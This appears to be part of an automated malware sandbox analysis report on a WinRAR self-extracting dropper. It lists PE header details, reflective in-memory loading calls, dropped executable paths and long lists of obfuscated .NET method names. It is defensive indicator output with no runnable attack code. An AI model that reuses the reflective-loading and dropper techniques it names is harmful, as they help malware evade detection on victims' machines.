            Source: hx1hwVZIjy.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hx1hwVZIjy.exe
            Source: hx1hwVZIjy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: hx1hwVZIjy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: hx1hwVZIjy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: hx1hwVZIjy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: hx1hwVZIjy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, Uy48Bwq9FymnVapyP1i.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, Uy48Bwq9FymnVapyP1i.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, j8eAhRa4LD1CKXA25bK.cs .Net Code: cmwQC6uwnQ System.AppDomain.Load(byte[])
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, j8eAhRa4LD1CKXA25bK.cs .Net Code: cmwQC6uwnQ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, j8eAhRa4LD1CKXA25bK.cs .Net Code: cmwQC6uwnQ
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, j8eAhRa4LD1CKXA25bK.cs .Net Code: cmwQC6uwnQ System.AppDomain.Load(byte[])
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, j8eAhRa4LD1CKXA25bK.cs .Net Code: cmwQC6uwnQ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, j8eAhRa4LD1CKXA25bK.cs .Net Code: cmwQC6uwnQ
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe File created: C:\ReviewHost\__tmp_rar_sfx_access_check_5247234
            Source: hx1hwVZIjy.exe Static PE information: section name: .didat
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F4E28C push eax; ret 0_2_00F4E2AA
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F4ED46 push ecx; ret 0_2_00F4ED59
            Source: C:\ReviewHost\brokercrt.exe Code function: 5_2_00007FF848F100BD pushad ; iretd 5_2_00007FF848F100C1
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Code function: 35_2_00007FF848F300BD pushad ; iretd 35_2_00007FF848F300C1
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Code function: 37_2_00007FF848F000BD pushad ; iretd 37_2_00007FF848F000C1
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, multiple .cs files: High entropy of concatenated method names
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, vlqRUwZQwP31ejWAcr.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'rp86JgsQD1pgVtuLXjb', 'ee6W3QsUoTs0BgooyAX', 'at7gmWs58BdS1uoQeNR', 'ccJWt8sI2Wa1xsrBSFB', 'UApWOasmxO4ZytBbCZZ', 'RyVcd5spo3NCQy40LX2'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, GS0E2YMsUZGI59VSJi5.csHigh entropy of concatenated method names: 'FR4wu8ZJ0u', 'D5qwD8MX58', 'hXYwFowP9s', 'OZwwqw4PAY', 'FArwoXRoHM', 'jx2F2xwTbfigIcbTcnS', 'DDCJQJwileb89DHGo5X', 'EXFhsRwA31WQ8BwoOMJ', 'R57IorwzFjjWqlShUMZ', 'tHiCI2ZuMIrxJOeitw3'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, NZS9H4M339xZE4MdcG6.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'dL5mpsJ93o', 'mVZm0FSYwB', 'pNJm21UBRg', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, dSkjfSgxBEqFa5wHsJv.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'kjKCTqhRVF', 'EcJChEADDu', 'r8j', 'LS1', '_55S'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, w56bXom0dXEriIhivOM.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'denUDCY5SqMZV2SLWAX', 'xKoADEYIkolCTgYhjUw', 'Vw1g31YmmuYFSjLpEVE', 'zBm6gOYpmOaalNQeYVG', 'lV1RTrY2fqpFThg66ec', 'WxpX3nYFO5IylQDipNb'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, NlYaCyFyDDPbDXoZU7h.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'npHXl1hCuh', '_168', 'HVMarXn9Lav6kmOdDOe', 'HPrEK0nO5LihL7G6IBh', 'hZHicBnNGg7ocMw6uyE', 'iGn3DdnDe2Ng3J71oXJ', 'kBrw5RngPyAdcp3Ap0e'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, blgrJxMa5i9HZKn2PMH.csHigh entropy of concatenated method names: 'MkwwXXxbGp', 'V70wpnw4Cr', '_8r1', 'kr1w0T20ih', 'tUrw2ZPByh', 'U1gwsdLkub', 'cUMwASYBXx', 'oMN1r9weGT4ypUqGCy3', 'phUSW4waIvlfICHtiTk', 'xxlYpCwShmaj7Z0rZXF'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, OTkde9yXDnDKumBGoH.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'dxHYaVRY361Ldrx43uW', 'dHWFBtRrl72eXA5ybSe', 'cEydpdRt2hJkGxas5On', 'lPBpkCRKw2gEmsVtI81', 'dQtpmoR16uRUc5kg1Mv', 'BRsfajRE92TfOO8Talp'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, tSmyd9a5Xm8JNoR4mW3.csHigh entropy of concatenated method names: 'uHPQdDTQDA', 'p6UM4S0JXeTHFWEvkOX', 'ApNnrN0sEMl76xrSlFN', 'Itr1550vVMhgs7oX4Dg', 'LvJgF00bwO2RLFEX7EL', 'HU5qGk0RSLlTVbVI0fM', 'MqxaxD0YhxsdLTVRqNB', 'xX50NL0rpB5pDqqyP58', 'cuc94v0tVGjZauX1cEU', 'gX9OMF0KvVXKwyl8OTb'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, PigKVaFzDwydkmCEZNB.csHigh entropy of concatenated method names: 'rlv0RypVv2', 'Xna0cuD8uS', 'IAt0m5i2eK', 'b0b80QyZ0MZyBphtOED', 'IjfmZuy6c1I9TMJiSxu', 'E3uQY6y3FdR9isvxxRd', 'PWqpdiywR5FlKF1LDgr', 'KbE280yQBH64SOXLDwT', 'PJDorIyU5MHDDl5XLVj', 'BNbpyyy5s4ObVysZtY3'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, H04jjeMoCO4LqIxl6lq.csHigh entropy of concatenated method names: 'kyhgLxwLgN', 'plZg3pCmPl', 'iRfgvr0GbY', 'y4Gg4Ku2xn', 'LyCgBUh10H', 'mr8gPVduX5', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, owmyYYgv0am8u8ZaDSG.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, ek1B5GeKtoJn3aMbsT.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'vHE1uwUSD', 'xW9hPgbGHgnmG2KYTHa', 'tsDpdRbl08LQku0dqGU', 'CZvgXtbjFGr766SfsNO', 'rnEXsPbkZQwkpT15601', 'v87vkYb3XENMUKPqLfu'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, bke20pmO08Fq6cnxQ7r.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'nN4apItIc3FGO5qkUTq', 'FKM085tmKiApfHqDK3X', 'opLS50tpLTos6ZEOiNv', 'o9t4wUt2llJlt2JVJxr', 'gGGwfPtFsChGMchjqaI', 'GuDahLtdNwmFubvtJPi'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, Evl3cAqOFiVg9mM2ClZ.csHigh entropy of concatenated method names: 'GQVG9v9xht', 'kbiGgkNI3N', 'lcxGwPeWYO', 'XjSGbVZxTB', 'pmeGRD4yCD', 'kqUGca3wkP', 'Py5GmgClAO', 'PbSGnmItgS', 'LGUGGtN3Ko', 'oWwGKVcImB'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, By73cFaHvpBc4HC8PrC.csHigh entropy of concatenated method names: 'AdwQzmgoxk', 'pTJt7nmgNn', 'yhlt83eyvN', 'NNdtkZ9vcc', 'RdGtQkK3uj', 'pP8ttFf6M1', 'QxdtJGYbfK', 'RkftYHMnRt', 'wNRt5m1pJC', 'x8YtX4MraO'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, FxJ6QNmnwPMo7OvtXq2.csHigh entropy of concatenated method names: 'xR08LtZTiQ', 'zqU17N1bvfaRrf3t8DB', 'iu9AjI1JABCv12Qk0l1', 'w9vEn81u6sCbYmSu49u', 'iMZjko1vkTMU6V1s1Ns', 'OL0kh81ssuEWMfQmStL', 'QEPvXa1RyFaGkqtG32m', 'w2HTdi1YJQLOEyYftuA', 'NMU8vTNd52', 'mWEPaF1K02GRiZLoY5r'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, mhpvIirR2cvRa7E9Pf.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'obsUSkJowlvh4XU1pHw', 'zRj446JTjN9yD73Txub', 'km4rCKJidnVYWtN6pwF', 'JfRTJsJA7MjUorNOm02', 'durCPBJzUOrYUSbeDVM', 'dEWcJQsuHwIREdCyL4q'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, bHbkAe0FcDZuHP4qInt.csHigh entropy of concatenated method names: 'o4TkuCXLmIYZTPHbyIr', 'kfrRGCXniwA6PePojAR', 'iecVwMXWmO7ELxcSZEB', 'nsdhk4XHPesLrqTXHkx', 'dtnu9YlZiF', 'PRwgvgXOqYAZEfc1CCG', 'mdcTRZXNJPJoRi9x7jk', 'gxJOpeXy6PX6LPSmS3n', 'rRTNgTX9Ljl4LtOkxfs', 'nFbL5SXDs62jAkSGhwe'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, HA0jxummkOGQ0ZZKu2b.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'Ae3p3FYhiLQGVp22Fgw', 'SKPx4LYfPH5c6OCKbdk', 'I7uaC2YWJPNky3dcwVX', 'LTseR4YHUbSsecOrFxR', 'MUbrXXYL0XdFIeWwpjc', 'bG6jj2Ynb2i79YUmFgP'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, fMKenYarA42w2WuhMuA.csHigh entropy of concatenated method names: 'zPCYXYSHHY', 'Ab8YpIYWTS', 'OwoRNDS8lMLKQeZqrOZ', 'ubvPslSoWmV7xclu7TU', 'bBcu7vSdsFxG3b5wyxn', 'lV9cLFSMCeTrFC5aQRh', 'EZCYH81jIU', 'grkXwJ4u0f5ixGK0qYH', 'KwA6iv4vHZ2Qk4IRd5B', 'RDjnWISABPKdvHIjY3C'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, r2Bw81mU2g4lQVpaIFT.csHigh entropy of concatenated method names: 'YMek8pRdMc', 'TYFkkbTRX4', 'Kd1kQvsJMO', 'pnyLgq1FlT8C4CVBlGl', 'sXxLiS1d7XbfEIAvulp', 'QNPihS1pDYaWHmUOZYu', 'GLnYrB12wQB8w5odnUW', 'DsDZNI1MitgPu9QJ1Fs', 'm3iDGS18xrbVHITQtdX', 'r0HINF1oel56XOOU8OL'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, mXBbRbmEy2xiM1UUACi.csHigh entropy of concatenated method names: 'HK18x4Aug9', 'LkCHAy1jCkBo1SM6URv', 'X7GTxy1kPeMLToCMqn9', 'YdXXic1GIQEmR4SB9d0', 'faLLPF1lnMNexAqJWjB', 'NPXCDo13MS0vKYy47Y0', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, kVEuDGF1SyuD1e5MA0W.csHigh entropy of concatenated method names: 'tJdPCeyjuJ8F8CNo8QK', 'JaQgesyknf38uVAKQtU', 'KxJU43yGlg9QS6L15YU', 'aHOaHrylqySEE3vrMph', 'IWF', 'j72', 'VXd0HfJ5Mp', 'ckx0y53KAf', 'j4z', 'aTM0iCCRRP'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, gbJdVhaaIagNGuoITLx.csHigh entropy of concatenated method names: 'DCNkvRjH7K', 'rLTk4FXFGK', 'oY7kBYKshr', 'j3qkPGLM5A', 'eQTkfWg9V1', 'yOckN74fmb', 'u3bn9exS5O5vT4Q90v1', 'WGwCr3x4PH90AowC4HE', 'pAdFuhxe04Iy2fa6LDI', 'nReobgxaj8fcTYssXu0'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, xK0lWAaLgeioh5oXL5h.csHigh entropy of concatenated method names: 'eo7tDORPOl', 'tvOtFjwpf4', 'XYctq3V78X', 'oyQtou9r1h', 'QdMt9rVg8g', 'EBRCW7euqboCdC0QVNc', 'ws6MVnevyEfAFfTk2YS', 'isVkie7AvWMWJuw1RrZ', 'uu2QXv7zAuUtDpZv3pi', 'RVrjrFebiyJFT2G06wW'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, y4LFEImfIk4p8nqxTfb.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'zr4BnvKlJVnL8Tu74b4', 'f0sfqLKjjMw0mgmcpPK', 'RibU0wKkd63LChr3Q8M', 'MdwcyIK3VflswbwVE8K', 'TjpX30KwPExKhjSEeQv', 'QXhwyWKZ9xSZLoU6YJu'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, aJhSi2qJ0h96BUl08RX.csHigh entropy of concatenated method names: 'ydpiftYYu1d9H', 'dL5Jio57KDDpYRZ5wFw', 'JeNAj05eILTTcUCKFin', 'mpP36o5a3Z0grOAR7Cx', 'NW8LEh5SnXXMyAgqrg6', 'wRt8Di54IynSv5YoLRx', 'EakKwr5BvOi1AtPTi7G', 'YvHARX50HLQqvc3TMPl', 'uMEmQg5hnx8SFjMqaRK', 'JZ929N5f4SWhxF8mfCs'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, XsxJv73VDyfZNs3OMp.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'DVLSZdsS1kIKSG2eU1a', 'a8TUAys4jAha0BYCtf3', 'HeyJnXshqYG51GbP8sB', 'CcYseFsf6DHBYL6rGeK', 'fTrPYVsWxDBbU7461ZT', 'ujD3lWsH7Zm6VDj03iN'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, TFHhWBq307YNEM9XoC.csHigh entropy of concatenated method names: 'tTFExbRe7', 'tArVccXt6EQ8nQDvgv', 'UY7XIvqTHZ03vXFsDA', 'spsf2pVQpEaV8HtCRl', 'IfCAN1PAm3KX61UvKW', 'MgEEM5GHPXo8FMj78F', 'ehskk0TtI', 'ox4QLEl2L', 'XqwtPs6YI', 'XLiJb0BmR'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, zNfggi0TKHU3h0ejY5x.csHigh entropy of concatenated method names: 'UpJgRY2fn3', 'k9Rgc4xSqG', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'dwZgmES5MB', '_5f9', 'A6Y'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, T2euL90nlQnc8g1Gqx9.csHigh entropy of concatenated method names: 'AAY9vEjMJn', 'jUx94pP1Pw', 'Rbd9BAn8rs', 'GrOqT3jwIF8O97hAuvp', 'XRjb9wjkAQfHYoU6eev', 'juRb00j3Cr80njJOX2p', 'X5dPQ9jZWPZhyPgo1po', 'v0o6kmj6HgACeUoMSBx', 'wkbLJxjQVM0MbIDET0d', 'QN0NuNjUKre02b6Jy3Z'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, wCfM5yMftbsogsD0YtK.csHigh entropy of concatenated method names: 'iw4bpukoNh', 'YJeb07NwRH', 'Kddb2vNavk', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'kITbsuRCTV'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, asZ9DE1ccM4YKcHyXO.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'c3cldtRUXMGicFKRvO8', 'wQhSXeR5vGpKZip3yMb', 'JuiRkJRITNBjPakYqK9', 'MAuxdTRm1d62XNDe5ou', 'lySetERpNhS2xdsxqx5', 'eHwWbZR2BtBKIoP7qQl'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, rsFBbmgJ33m0WqROnwb.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, diE1NG0herVKOKEhH0O.csHigh entropy of concatenated method names: 'KG8g7pMNWU', 'iQOVfjjTw6h9KvgLBAy', 'kemDwmj8yWfhVaCpbp6', 'upYOdLjoS1t2qcnI6c0', 'boUlCZjijxjE28IKkUe', 'iLobq6jAuQp8Nwq6efi', 'JxDjqNjzra4lUmrnBga'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, kScwTgWlQTYNUx2whp.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'pP8DltR7OmaTNN7jhig', 'pygQKGReRaPororfoZL', 'Hglp1IRaY2EIceH3Wyp', 'EOCgVHRSrKoTVm9roem', 'uJGd8cR4E00xyWp30SA', 'oHMUMJRhiSOU9dnvihP'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, TQUNjMMMkxXor8NymWG.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, hNYBPtg1B7Yhs0fKEYA.csHigh entropy of concatenated method names: 'LVsTgIXgLi', 'pveTbTQU8E', 'g0BTE8HTha', 'rlbTCSdLmK', 'jNDTTeDWtP', 'HivThoNATk', 'FFJTHQpfQl', 'oLDTyoNj7N', 'Yh2TiOtXS5', 'xFATZTKm0t'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, zJuQfFF3KgI6yXhl2fK.csHigh entropy of concatenated method names: '_5u9', 'GVRXTBj4W2', 'UeF07PnND7', 'v8yXYZhaTg', 'VSI9YILTvJTGdT7w95a', 'So43pyLii1roQ9gapOh', 'qT101RLA0rCs91m5oUc', 'be7sDmL8bspXhU8jtpb', 'dRAELKLoSHHUwtPwdTO', 'nlgyFvLzeLKFRu86kGo'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, ip8Bkt0X3UG3hb3ABuB.csHigh entropy of concatenated method names: 'rvGb7dkRFupEVniLbeY', 'EXXHJXkYOU0aooiCsuE', 'jXSdBjkJV5MQ0hEcydx', 'rbX6YBks3xZIZA1Z40Y', 'g4Eo7Mkr3emtn7RKf1Y', 'T8EVDUktx0Pi6fHrg3c', 'nVGkghkKfDPlLaTkgLw'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, cdTMiOgks9X2hco0roI.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'TnGE78WY49', '_3il', 'CQmE8lwkI3', 'oueEkFfe7u', '_78N', 'z3K'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, xOFT2jm1PkFksqZNEPX.csHigh entropy of concatenated method names: 'D3xkZcrcTu', 'vRMZWycYFarMffslkh6', 'DpXRmUcreUnjSTf319n', 'Mf56VZcsDn7KSibAvGx', 'sxkCJqcRNUYr4J1Hn8U', 'zTikB1ctnVQghZ0RDUT', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, a7HAluMdPPpmLOxBBjr.csHigh entropy of concatenated method names: 'msNcSNt7bp', 'gXqsCbQCU2INdrThoZG', 'jkUfDbQqCsZuIWf4HdB', 'XOPaO9QDjfLUZdFVtDx', 'wiilRiQgpojZBqodxmn', '_1fi', 'cUuRPBUMn7', '_676', 'IG9', 'mdP'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, Jt8CxxmJ64G8yUjnbUT.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'Bx0Q0prhtoVDraC8RUn', 'CafRvxrf70NemiEC8FX', 'qVYjMxrWmtubic5QZVg', 'PTwKQqrHib1xs42KpYE', 'dLMQUYrLfeNRTePQwPB', 'mEp1exrneS3DNEhQFkO'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, MrZfWrF6t0EjslxUXd9.csHigh entropy of concatenated method names: '_223', 'RrPaJSWSrjuUBG5SXL0', 'y8LkdGW4EsMw9gO6D63', 'bLnGihWhbRBTcB7oP5N', 'WvVqIfWfv8J0g8uWXwD', 'ftMpwNWWX0XfGkeDasu', 'S8IFGDWHp8g0WIUUCJa', 'xVK3VxWLVpiufxZEoUj', 'lxPQBJWnOioBZLTMJpJ', 'B9p7dAWyZTkF1tCSSZQ'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, rwQr8sMOa8k6IjC5GbC.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, gwsBrqgAcTyaRGRXvHY.csHigh entropy of concatenated method names: 'wthEO6CAaJ', 'Il5EM0N1sS', 'uc5EWlunPj', 'UY9EjKwMFs', 'xbQESq4cRs', 'YSb6hwNhNimaXnaipED', 'g7IkasNSSekwuRxcrNk', 'rBnYODN4veUVddgvCvO', 'VxDSfHNfotOQY36d9Q4', 'y7lhNQNWVdyaUlxEHOW'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, vnCHqHm6kXEmGFp6Wuw.cs High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'FmtUAarNBf1C05oMQs7', 'j8cFsRrDlBYQeYWFQ6l', 'qiKD1arg5wCqQC3MTel', 'XKYVq7rCPT9VUkU2n8C', 'AM1eKBrquOcYpogES27', 'V6J5BqrVGs6l6tJJMmu'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, vlqRUwZQwP31ejWAcr.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'rp86JgsQD1pgVtuLXjb', 'ee6W3QsUoTs0BgooyAX', 'at7gmWs58BdS1uoQeNR', 'ccJWt8sI2Wa1xsrBSFB', 'UApWOasmxO4ZytBbCZZ', 'RyVcd5spo3NCQy40LX2'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, GS0E2YMsUZGI59VSJi5.csHigh entropy of concatenated method names: 'FR4wu8ZJ0u', 'D5qwD8MX58', 'hXYwFowP9s', 'OZwwqw4PAY', 'FArwoXRoHM', 'jx2F2xwTbfigIcbTcnS', 'DDCJQJwileb89DHGo5X', 'EXFhsRwA31WQ8BwoOMJ', 'R57IorwzFjjWqlShUMZ', 'tHiCI2ZuMIrxJOeitw3'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, NZS9H4M339xZE4MdcG6.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'dL5mpsJ93o', 'mVZm0FSYwB', 'pNJm21UBRg', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, dSkjfSgxBEqFa5wHsJv.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'kjKCTqhRVF', 'EcJChEADDu', 'r8j', 'LS1', '_55S'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, w56bXom0dXEriIhivOM.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'denUDCY5SqMZV2SLWAX', 'xKoADEYIkolCTgYhjUw', 'Vw1g31YmmuYFSjLpEVE', 'zBm6gOYpmOaalNQeYVG', 'lV1RTrY2fqpFThg66ec', 'WxpX3nYFO5IylQDipNb'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, NlYaCyFyDDPbDXoZU7h.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'npHXl1hCuh', '_168', 'HVMarXn9Lav6kmOdDOe', 'HPrEK0nO5LihL7G6IBh', 'hZHicBnNGg7ocMw6uyE', 'iGn3DdnDe2Ng3J71oXJ', 'kBrw5RngPyAdcp3Ap0e'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, blgrJxMa5i9HZKn2PMH.csHigh entropy of concatenated method names: 'MkwwXXxbGp', 'V70wpnw4Cr', '_8r1', 'kr1w0T20ih', 'tUrw2ZPByh', 'U1gwsdLkub', 'cUMwASYBXx', 'oMN1r9weGT4ypUqGCy3', 'phUSW4waIvlfICHtiTk', 'xxlYpCwShmaj7Z0rZXF'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, OTkde9yXDnDKumBGoH.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'dxHYaVRY361Ldrx43uW', 'dHWFBtRrl72eXA5ybSe', 'cEydpdRt2hJkGxas5On', 'lPBpkCRKw2gEmsVtI81', 'dQtpmoR16uRUc5kg1Mv', 'BRsfajRE92TfOO8Talp'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, tSmyd9a5Xm8JNoR4mW3.csHigh entropy of concatenated method names: 'uHPQdDTQDA', 'p6UM4S0JXeTHFWEvkOX', 'ApNnrN0sEMl76xrSlFN', 'Itr1550vVMhgs7oX4Dg', 'LvJgF00bwO2RLFEX7EL', 'HU5qGk0RSLlTVbVI0fM', 'MqxaxD0YhxsdLTVRqNB', 'xX50NL0rpB5pDqqyP58', 'cuc94v0tVGjZauX1cEU', 'gX9OMF0KvVXKwyl8OTb'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, PigKVaFzDwydkmCEZNB.csHigh entropy of concatenated method names: 'rlv0RypVv2', 'Xna0cuD8uS', 'IAt0m5i2eK', 'b0b80QyZ0MZyBphtOED', 'IjfmZuy6c1I9TMJiSxu', 'E3uQY6y3FdR9isvxxRd', 'PWqpdiywR5FlKF1LDgr', 'KbE280yQBH64SOXLDwT', 'PJDorIyU5MHDDl5XLVj', 'BNbpyyy5s4ObVysZtY3'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, H04jjeMoCO4LqIxl6lq.csHigh entropy of concatenated method names: 'kyhgLxwLgN', 'plZg3pCmPl', 'iRfgvr0GbY', 'y4Gg4Ku2xn', 'LyCgBUh10H', 'mr8gPVduX5', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, owmyYYgv0am8u8ZaDSG.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, ek1B5GeKtoJn3aMbsT.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'vHE1uwUSD', 'xW9hPgbGHgnmG2KYTHa', 'tsDpdRbl08LQku0dqGU', 'CZvgXtbjFGr766SfsNO', 'rnEXsPbkZQwkpT15601', 'v87vkYb3XENMUKPqLfu'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, bke20pmO08Fq6cnxQ7r.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'nN4apItIc3FGO5qkUTq', 'FKM085tmKiApfHqDK3X', 'opLS50tpLTos6ZEOiNv', 'o9t4wUt2llJlt2JVJxr', 'gGGwfPtFsChGMchjqaI', 'GuDahLtdNwmFubvtJPi'
